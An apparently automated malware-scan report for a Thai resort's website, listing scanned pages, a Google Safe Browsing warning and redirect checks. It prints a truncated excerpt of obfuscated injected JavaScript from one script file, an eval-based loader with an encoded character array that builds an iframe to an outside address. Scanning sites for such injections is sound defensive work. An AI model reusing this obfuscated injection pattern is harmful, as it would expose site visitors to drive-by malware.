Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=noppharatresort.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.noppharatresort.com/ | 200 OK Content-Length: 2584 Content-Type: text/html | clean |
http://www.noppharatresort.com/home.html | 200 OK Content-Length: 8163 Content-Type: text/html | clean |
http://www.noppharatresort.com/index.html | 200 OK Content-Length: 2584 Content-Type: text/html | clean |
http://www.noppharatresort.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.noppharatresort.com/facility.html | 200 OK Content-Length: 6476 Content-Type: text/html | clean |
http://www.noppharatresort.com/room_rate.html | 200 OK Content-Length: 30863 Content-Type: text/html | clean |
http://www.noppharatresort.com/js/prototype.js | 200 OK Content-Length: 126132 Content-Type: application/javascript | clean |
http://www.noppharatresort.com/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 2654 Content-Type: application/javascript | clean |
http://www.noppharatresort.com/js/lightbox.js | 200 OK Content-Length: 18389 Content-Type: application/javascript | clean |
http://www.noppharatresort.com/scripts/AC_RunActiveContent.js | 200 OK Content-Length: 12506 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval("Str"+"ing");d=document;a="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,6d,6f,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,6d,6f,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,63,66,67,6b,63,30,6b,76,31,65,6e,6b,65,6d,67,74,30,72,6a,72,29,3d,f,c,22,22,22,22,6d,6f,30,75,76,7b,6e,67,30,72,71,75,6b,76,6b,71,70,22,3f,22,29,63,64,75,71,6e,77,76,67,29,3d,f,c,22,22,22,22,6d,6 Antivirus reports:
| ||
http://www.noppharatresort.com/activity.html | 200 OK Content-Length: 18207 Content-Type: text/html | clean |
http://www.noppharatresort.com/contract_us.html | 200 OK Content-Length: 7311 Content-Type: text/html | clean |
http://www.noppharatresort.com/special_offer.html | 200 OK Content-Length: 10520 Content-Type: text/html | clean |
http://www.noppharatresort.com/booking.html | 200 OK Content-Length: 31950 Content-Type: text/html | clean |
http://www.noppharatresort.com/gallery.html | 200 OK Content-Length: 19453 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: noppharatresort.com
Result:
GET / HTTP/1.1
Host: noppharatresort.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: noppharatresort.com
Referer: http://www.google.com/search?q=noppharatresort.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: noppharatresort.com
Referer: http://www.google.com/search?q=noppharatresort.com
Result:
The result is similar to the first query. There are no suspicious redirects found.